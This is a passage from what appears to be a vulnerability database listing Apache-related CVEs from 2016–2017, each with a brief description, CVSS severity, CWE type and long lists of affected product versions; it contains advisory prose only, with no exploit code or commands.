A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, not not limited to, session ID and the response body. The bug was first noticed in 8.5.x onwards where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug but further investigation has shown that the bug is present in all currently supported Tomcat versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-388,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.5.2
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 8.0
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2016-8746 MEDIUM

Apache Ranger before 0.6.3 policy engine incorrectly matches paths in certain conditions when policy does not contain wildcards and has recursion flag set to true.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-426,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-8747 MEDIUM

An information disclosure issue was discovered in Apache Tomcat 8.5.7 to 8.5.9 and 9.0.0.M11 to 9.0.0.M15 in reverse-proxy configurations. Http11InputBuffer.java allows remote attackers to read data that was intended to be associated with a different request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 8.5.9
apache tomcat 9.0.0
apache tomcat 8.5.7
apache tomcat 8.5.8
CVE-2016-8748 LOW

In Apache NiFi before 1.0.1 and 1.1.x before 1.1.1, there is a cross-site scripting vulnerability in connection details dialog when accessed by an authorized user. The user supplied text was not being properly handled when added to the DOM.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
apache nifi 1.1.0
CVE-2016-8749 HIGH

Apache Camel's Jackson and JacksonXML unmarshalling operation are vulnerable to Remote Code Execution attacks.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel 2.17.1
apache camel 2.16.4
apache camel 2.17.0
apache camel 2.16.0
apache camel 2.17.3
apache camel 2.18.0
apache camel 2.18.1
apache camel 2.16.1
apache camel 2.16.3
apache camel 2.17.2
apache camel 2.17.4
apache camel 2.16.2
CVE-2016-8750 MEDIUM

Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-90,

Products Affected

Vendor Product Version
apache karaf *
CVE-2016-8751 LOW

Apache Ranger before 0.6.3 is vulnerable to a Stored Cross-Site Scripting in when entering custom policy conditions. Admin users can store some arbitrary javascript code to be executed when normal users login and access policies.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2016-8752 MEDIUM

Apache Atlas versions 0.6.0 (incubating), 0.7.0 (incubating), and 0.7.1 (incubating) allow access to the webapp directory contents by pointing to URIs like /js and /img.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache atlas 0.7.1
apache atlas 0.7.0
apache atlas 0.6.0
CVE-2016-9774 HIGH

The postinst script in the tomcat6 package before 6.0.45+dfsg-1~deb7u4 on Debian wheezy, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u8 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to obtain sensitive information or gain root privileges via a symlink attack on the Catalina localhost directory.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-59,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
apache tomcat 8.0
canonical ubuntu_linux 14.04
apache tomcat 7.0
canonical ubuntu_linux 16.10
apache tomcat 6.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2016-9775 HIGH

The postrm script in the tomcat6 package before 6.0.45+dfsg-1~deb7u3 on Debian wheezy, before 6.0.45+dfsg-1~deb8u1 on Debian jessie, before 6.0.35-1ubuntu3.9 on Ubuntu 12.04 LTS and on Ubuntu 14.04 LTS; the tomcat7 package before 7.0.28-4+deb7u7 on Debian wheezy, before 7.0.56-3+deb8u6 on Debian jessie, before 7.0.52-1ubuntu0.8 on Ubuntu 14.04 LTS, and on Ubuntu 12.04 LTS, 16.04 LTS, and 16.10; and the tomcat8 package before 8.0.14-1+deb8u5 on Debian jessie, before 8.0.32-1ubuntu1.3 on Ubuntu 16.04 LTS, before 8.0.37-1ubuntu0.1 on Ubuntu 16.10, and before 8.0.38-2ubuntu1 on Ubuntu 17.04 might allow local users with access to the tomcat account to gain root privileges via a setgid program in the Catalina directory, as demonstrated by /etc/tomcat8/Catalina/attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
apache tomcat 8.0
canonical ubuntu_linux 14.04
apache tomcat 7.0
canonical ubuntu_linux 16.10
apache tomcat 6.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-1000190 MEDIUM

SimpleXML (latest version 2.7.1) is vulnerable to an XXE vulnerability resulting SSRF, information disclosure, DoS and so on.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
simplexml_project simplexml 2.7.1
simplexml_project simplexml *
apache solr 8.4.1
CVE-2017-12171 MEDIUM

A regression was found in the Red Hat Enterprise Linux 6.9 version of httpd 2.2.15-60, causing comments in the "Allow" and "Deny" configuration lines to be parsed incorrectly. A web administrator could unintentionally allow any client to access a restricted HTTP resource.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_linux 6.9
redhat enterprise_linux_server 6.0
apache http_server 2.2.15-60
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_desktop 6.0
CVE-2017-12174 HIGH

It was found that when Artemis and HornetQ before 2.4.0 are configured with UDP discovery and JGroups discovery a huge byte array is created when receiving an unexpected multicast message. This may result in a heap memory exhaustion, full GC, or OutOfMemoryError.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-400,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 6.0.0
apache activemq_artemis *
redhat jboss_enterprise_application_platform 6.4.0
redhat hornetq *
redhat jboss_enterprise_application_platform 7.1.0
CVE-2017-12607 MEDIUM

A vulnerability in OpenOffice's PPT file parser before 4.1.4, and specifically in PPTStyleSheet, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-12608 MEDIUM

A vulnerability in Apache OpenOffice Writer DOC file parser before 4.1.4, and specifically in ImportOldFormatStyles, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2017-12610 MEDIUM

In Apache Kafka 0.10.0.0 to 0.10.2.1 and 0.11.0.0 to 0.11.0.1, authenticated Kafka clients may use impersonation via a manually crafted protocol message with SASL/PLAIN or SASL/SCRAM authentication when using the built-in PLAIN or SCRAM server implementations in Apache Kafka.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache kafka *
CVE-2017-12611 HIGH

In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.1.5
apache struts 2.5.4
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.3.28.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.5.10
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.0.14
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.1.1
apache struts 2.3.29
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.0.8
apache struts 2.3.24.2
apache struts 2.3.4
apache struts 2.3.30
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-12612 HIGH

In Apache Spark 1.6.0 until 2.1.1, the launcher API performs unsafe deserialization of data received by its socket. This makes applications launched programmatically using the launcher API potentially vulnerable to arbitrary code execution by an attacker with access to any user account on the local machine. It does not affect apps run by spark-submit or spark-shell. The attacker would be able to execute code as the user that ran the Spark application. Users are encouraged to update to version 2.2.0 or later.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache spark 2.0.0
apache spark 1.6.1
apache spark 2.1.1
apache spark 1.6.3
apache spark 2.0.1
apache spark 2.0.2
apache spark 2.1.0
apache spark 1.6.0
apache spark 1.6.2
CVE-2017-12613 LOW

When apr_time_exp*() or apr_os_exp_time*() functions are invoked with an invalid month field value in Apache Portable Runtime APR 1.6.2 and prior, out of bounds memory may be accessed in converting this value to an apr_time_exp_t value, potentially revealing the contents of a different static heap value or resulting in program termination, and may represent an information disclosure or denial of service vulnerability to applications which call these APR functions with unvalidated external input.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H 1.8 5.2

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_aus 6.4
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
apache portable_runtime *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat jboss_core_services -
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
debian debian_linux 7.0
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 6.5
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server_tus 6.6
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 6.6
redhat software_collections 1.0
redhat enterprise_linux_server 7.0
CVE-2017-12614 MEDIUM

It was noticed an XSS in certain 404 pages that could be exploited to perform an XSS attack. Chrome will detect this as a reflected XSS attempt and prevent the page from loading. Firefox and other browsers don't, and are vulnerable to this attack. Mitigation: The fix for this is to upgrade to Apache Airflow 1.9.0 or above.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2017-12615 MEDIUM

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,CWE-434,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 9.2_ppc64le
apache tomcat 7.0.44
redhat enterprise_linux_server 6.0
redhat enterprise_linux_for_ibm_z_systems_eus 7.6_s390x
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_for_power_little_endian_eus 7.5_ppc64le
redhat enterprise_linux_server_update_services_for_sap_solutions 7.4
apache tomcat 7.0.62
apache tomcat 7.0.33
redhat enterprise_linux_eus_compute_node 7.6
redhat enterprise_linux_eus 7.5
apache tomcat 7.0.3
apache tomcat 7.0.40
redhat enterprise_linux_desktop 6.0
apache tomcat 7.0.72
redhat enterprise_linux_workstation 6.0
apache tomcat 7.0.5
apache tomcat 7.0.71
redhat enterprise_linux_eus_compute_node 7.7
apache tomcat 7.0.0
redhat enterprise_linux_server 7.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
redhat enterprise_linux_server_tus 7.6
netapp oncommand_balance -
redhat enterprise_linux_for_power_big_endian_eus 7.7_ppc64
apache tomcat 7.0.38
apache tomcat 7.0.64
redhat enterprise_linux_for_power_little_endian_eus 7.4_ppc64le
redhat enterprise_linux_for_power_big_endian_eus 7.5_ppc64
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.67
apache tomcat 7.0.7
netapp 7-mode_transition_tool -
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.7_ppc64le
apache tomcat 7.0.34
redhat enterprise_linux_for_power_big_endian 7.0_ppc64
redhat enterprise_linux_server_aus 7.6
apache tomcat 7.0.24
redhat enterprise_linux_for_ibm_z_systems_eus 7.7_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 7.4_s390x
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
redhat enterprise_linux_for_ibm_z_systems_eus 7.5_s390x
apache tomcat 7.0.79
apache tomcat 7.0.8
apache tomcat 7.0.27
redhat enterprise_linux_for_power_big_endian_eus 7.4_ppc64
redhat enterprise_linux_server_aus 7.7
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 7.0.47
redhat enterprise_linux_eus_compute_node 7.5
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
redhat enterprise_linux_server_update_services_for_sap_solutions 7.6
redhat jboss_enterprise_web_server_text-only_advisories -
apache tomcat 7.0.68
apache tomcat 7.0.12
redhat enterprise_linux_server_tus 7.4
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
redhat enterprise_linux_for_power_big_endian_eus 7.6_ppc64
redhat enterprise_linux_for_power_little_endian_eus 7.7_ppc64le
apache tomcat 7.0.21
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.4_ppc64le
apache tomcat 7.0.31
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
redhat enterprise_linux_eus_compute_node 7.4
redhat enterprise_linux_server_tus 7.7
apache tomcat 7.0.11
apache tomcat 7.0.16
redhat jboss_enterprise_web_server 2.0.0
apache tomcat 7.0.75
apache tomcat 7.0.70
redhat enterprise_linux_server_update_services_for_sap_solutions 7.7
redhat enterprise_linux_for_power_little_endian 7.0_ppc64le
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
redhat enterprise_linux_eus 7.6
apache tomcat 7.0.23
apache tomcat 7.0.19
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_for_scientific_computing 7.0
apache tomcat 7.0.61
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 7.0
redhat enterprise_linux_for_power_little_endian_eus 7.6_ppc64le
redhat enterprise_linux_desktop 7.0
apache tomcat 7.0.58
redhat enterprise_linux_workstation 7.0
apache tomcat 7.0.20
redhat enterprise_linux_eus 7.7
apache tomcat 7.0.14
apache tomcat 7.0.49
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 7.0.55
apache tomcat 7.0.76
apache tomcat 7.0.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.6_ppc64le
apache tomcat 7.0.63
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
apache tomcat 7.0.22
CVE-2017-12616 MEDIUM

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 7.0.80
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 7.0.44
apache tomcat 7.0.68
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.72
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.75
apache tomcat 7.0.0
apache tomcat 7.0.70
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.77
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.61
apache tomcat 7.0.18
apache tomcat 7.0.67
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 7.0.34
apache tomcat 7.0.58
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.66
apache tomcat 7.0.79
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 7.0.63
apache tomcat 7.0.22
apache tomcat 7.0.51
apache tomcat 7.0.30
CVE-2017-12617 MEDIUM

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,CWE-434,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.4
canonical ubuntu_linux 18.04
redhat jboss_enterprise_application_platform 6.0.0
apache tomcat 8.0.20
oracle retail_xstore_point_of_service 7.0.6
oracle retail_price_management 12.0
oracle tuxedo_system_and_applications_monitor 12.1.3.0.0
apache tomcat 8.0.14
netapp element -
apache tomcat 7.0.44
redhat enterprise_linux_for_ibm_z_systems_eus 7.6_s390x
apache tomcat 8.0.11
redhat jboss_enterprise_web_server 3.0.0
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
oracle transportation_management 6.3.3
apache tomcat 8.5.9
oracle retail_point-of-service 14.0.4
apache tomcat 7.0.62
oracle retail_xstore_point_of_service 7.1.6
netapp snapcenter -
redhat enterprise_linux_eus_compute_node 7.6
apache tomcat 8.0.46
oracle retail_store_inventory_management 13.2.9
oracle retail_order_broker 5.1
redhat enterprise_linux_desktop 6.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.5
apache tomcat 7.0.71
redhat enterprise_linux_eus_compute_node 7.7
apache tomcat 8.5.21
apache tomcat 7.0.0
redhat enterprise_linux_server 7.0
redhat enterprise_linux_for_power_little_endian 7.0
apache tomcat 8.5.4
oracle retail_order_management_system 4.0
netapp oncommand_balance -
apache tomcat 8.5.11
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_for_power_big_endian_eus 7.7_ppc64
apache tomcat 8.0.17
apache tomcat 7.0.64
redhat enterprise_linux_for_power_little_endian_eus 7.4_ppc64le
redhat enterprise_linux_for_power_big_endian_eus 7.5_ppc64
apache tomcat *
oracle retail_xstore_point_of_service 6.0.11
apache tomcat 7.0.43
apache tomcat 8.5.22
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
netapp oncommand_insight -
redhat fuse 1.0
redhat enterprise_linux_for_power_big_endian 7.0_ppc64
apache tomcat 7.0.24
redhat enterprise_linux_for_ibm_z_systems_eus 7.7_s390x
apache tomcat 8.5.7
apache tomcat 8.5.19
apache tomcat 8.0.32
apache tomcat 8.0.44
oracle fmw_platform 12.2.1.3.0
apache tomcat 7.0.1
apache tomcat 7.0.6
redhat enterprise_linux_for_ibm_z_systems_eus 7.5_s390x
debian debian_linux 7.0
apache tomcat 7.0.79
oracle retail_store_inventory_management 14.0.4
apache tomcat 7.0.8
oracle webcenter_sites 11.1.1.8.0
redhat enterprise_linux_server_aus 7.7
apache tomcat 7.0.73
apache tomcat 8.0.19
oracle retail_central_office 14.0.4
apache tomcat 7.0.51
oracle retail_returns_management 2.4.9
apache tomcat 7.0.30
oracle retail_order_broker 5.2
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 7.0.81
oracle retail_eftlink 15.0.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 8.0.25
apache tomcat 8.0.36
oracle management_pack 11.2.1.0.13
redhat jboss_enterprise_web_server_text-only_advisories -
oracle agile_plm 9.3.6
apache tomcat 8.0.45
apache tomcat 7.0.41
oracle retail_order_management_system 4.7
oracle transportation_management 6.3.5
oracle retail_advanced_inventory_planning 14.1
apache tomcat 7.0.31
oracle retail_store_inventory_management 13.1.9
apache tomcat 7.0.17
oracle retail_invoice_matching 14.0
oracle retail_advanced_inventory_planning 15.0
apache tomcat 7.0.59
apache tomcat 7.0.75
oracle retail_invoice_matching 14.1
oracle retail_eftlink 16.0.2
oracle retail_returns_management 14.0.4
oracle retail_invoice_matching 16.0
apache tomcat 7.0.25
apache tomcat 8.5.17
oracle financial_services_analytical_applications_infrastructure *
oracle retail_insights 16.0
apache tomcat 7.0.15
apache tomcat 7.0.48
oracle hospitality_guest_access 4.2.1
apache tomcat 7.0.42
apache tomcat 7.0.74
redhat enterprise_linux_eus 7.6
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.29
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
oracle retail_back_office 14.1.3
redhat enterprise_linux_desktop 7.0
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 8.0.24
oracle retail_store_inventory_management 12.0.12
oracle retail_order_broker 16.0
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
oracle retail_store_inventory_management 15.0.2
oracle fmw_platform 12.2.1.2.0
oracle retail_price_management 13.2
oracle micros_retail_xbri_loss_prevention 10.0.1
netapp oncommand_workflow_automation -
oracle retail_store_inventory_management 16.0.1
apache tomcat 7.0.80
oracle retail_price_management 15.0
oracle retail_advanced_inventory_planning 13.4
oracle micros_lucas 2.9.5
netapp active_iq_unified_manager *
oracle micros_retail_xbri_loss_prevention 10.8.0
oracle retail_back_office 14.0.4
oracle retail_price_management 13.0
apache tomcat 8.5.5
apache tomcat 8.0.22
oracle retail_store_inventory_management 14.1.3
oracle workload_manager 12.2.0.1
oracle agile_plm 9.3.3
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
oracle hospitality_guest_access 4.2.0
redhat enterprise_linux_for_power_little_endian_eus 7.5_ppc64le
oracle retail_point-of-service 14.1.3
apache tomcat 8.0.35
apache tomcat 7.0.33
oracle retail_price_management 14.0
redhat enterprise_linux_eus 7.5
